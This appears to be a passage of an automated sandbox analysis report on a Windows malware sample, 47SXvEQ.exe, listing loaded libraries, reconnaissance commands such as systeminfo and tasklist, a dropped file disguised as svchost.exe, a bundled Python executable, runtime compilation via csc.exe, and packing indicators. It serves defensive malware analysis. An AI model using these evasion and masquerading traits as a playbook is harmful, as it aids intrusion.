Source: C:\ProgramData\Microsoft\svchost.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll

Source: C:\Users\user\Desktop\47SXvEQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 47SXvEQ.exe

Static file information: File size 13090304 > 1048576

Source: 47SXvEQ.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xad0200
Source: 47SXvEQ.exe	Static PE information: Raw size of ypfntliq is bigger than: 0x100000 < 0x1a7a00

Source:	Binary string: D:\_w\1\b\bin\amd64\select.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: Built.exe
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Built.exe
Source:	Binary string: D:\_w\1\b\libssl-1_1.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: Built.exe
Source:	Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: Built.exe

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\47SXvEQ.exe

Unpacked PE file: 0.2.47SXvEQ.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ypfntliq:EW;furbksed:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ypfntliq:EW;furbksed:EW;.taggant:EW;

Source: VCRUNTIME140.dll.4.dr

Static PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sywb4geu\sywb4geu.cmdline"

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 5_2_00007FFDF1413230 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

5_2_00007FFDF1413230

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: select.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xfc87
Source: python310.dll.4.dr	Static PE information: real checksum: 0x0 should be: 0x17ca6e
Source: _queue.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x6d76
Source: _socket.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x14fd9
Source: libssl-1_1.dll.4.dr	Static PE information: real checksum: 0x0 should be: 0x3a1a3
Source: Built.exe.0.dr	Static PE information: real checksum: 0x5ff8ab should be: 0x60009a
Source: libcrypto-1_1.dll.4.dr	Static PE information: real checksum: 0x0 should be: 0x1286c2
Source: _bz2.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x1b8d0
Source: _ctypes.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x146dd
Source: svchost.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x51069b
Source: _ssl.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x17c6f
Source: _sqlite3.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x1662a
Source: instals.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x51069b
Source: _hashlib.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0xc16f
Source: unicodedata.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x50159
Source: sqlite3.dll.4.dr	Static PE information: real checksum: 0x0 should be: 0x9ec83
Source: libffi-7.dll.4.dr	Static PE information: real checksum: 0x0 should be: 0x9bb1
Source: _lzma.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x19765
Source: _decimal.pyd.4.dr	Static PE information: real checksum: 0x0 should be: 0x1adec
Source: sywb4geu.dll.109.dr	Static PE information: real checksum: 0x0 should be: 0x104b5

Source: 47SXvEQ.exe	Static PE information: section name:
Source: 47SXvEQ.exe	Static PE information: section name: .idata
Source: 47SXvEQ.exe	Static PE information: section name:
Source: 47SXvEQ.exe	Static PE information: section name: ypfntliq
Source: 47SXvEQ.exe	Static PE information: section name: furbksed
Source: 47SXvEQ.exe	Static PE information: section name: .taggant
Source: instals.exe.0.dr	Static PE information: section name: .00cfg
Source: svchost.exe.1.dr	Static PE information: section name: .00cfg
Source: libffi-7.dll.4.dr	Static PE information: section name: UPX2
Source: VCRUNTIME140.dll.4.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FAA184 push rsp; ret	5_2_00007FFDF0FAA185
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA91C3 push rdi; iretd	5_2_00007FFDF0FA91C5
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA9C22 push rsp; retf	5_2_00007FFDF0FA9C23
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA6C41 push r10; ret	5_2_00007FFDF0FA6C43
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FAA305 push rsp; retf	5_2_00007FFDF0FAA306
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA9304 push r10; retf	5_2_00007FFDF0FA9370
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA857C push rbp; retf	5_2_00007FFDF0FA8595
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA9DA5 push rsp; iretq	5_2_00007FFDF0FA9DA6
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA85C7 push r12; ret	5_2_00007FFDF0FA8603
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA6E1B push rsp; ret	5_2_00007FFDF0FA6E23
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FAA4C9 push rdx; ret	5_2_00007FFDF0FAA520
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA6CEC push r8; ret	5_2_00007FFDF0FA6CF9
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA6D0A push rdx; ret	5_2_00007FFDF0FA6D11
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA6D16 push r12; ret	5_2_00007FFDF0FA6D18
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA8F73 push r12; iretd	5_2_00007FFDF0FA8F8A
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA6F74 push r8; ret	5_2_00007FFDF0FA6F7C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA6FAD push r10; ret	5_2_00007FFDF0FA6FC0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA780A push rsi; ret	5_2_00007FFDF0FA7841
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA6E64 push rdi; iretd	5_2_00007FFDF0FA6E66
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA8E86 push rbp; iretq	5_2_00007FFDF0FA8E87
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA6EAC push rsp; iretd	5_2_00007FFDF0FA6EAD
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA6EBB push rsi; ret	5_2_00007FFDF0FA6EBC
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA6ED6 push r10; retf	5_2_00007FFDF0FA6ED9
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA6EF0 push r12; ret	5_2_00007FFDF0FA6F0E
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA8F1E push r12; ret	5_2_00007FFDF0FA8F45
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF0FA6F52 push r12; ret	5_2_00007FFDF0FA6F6A
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFDF153F22E pushfq ; retn 0003h	5_2_00007FFDF153F2CD
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFE0C0AD39B push rsi; iretd	5_2_00007FFE0C0AD3A5
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 5_2_00007FFE0C0AD418 push rsi; retf	5_2_00007FFE0C0AD419
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9B79D2A5 pushad ; iretd	15_2_00007FFD9B79D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_00007FFD9B8B19BC pushad ; ret	15_2_00007FFD9B8B19C9

Source: 47SXvEQ.exe	Static PE information: section name: entropy: 7.694717025001675
Source: 47SXvEQ.exe	Static PE information: section name: ypfntliq entropy: 7.952151955456021

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
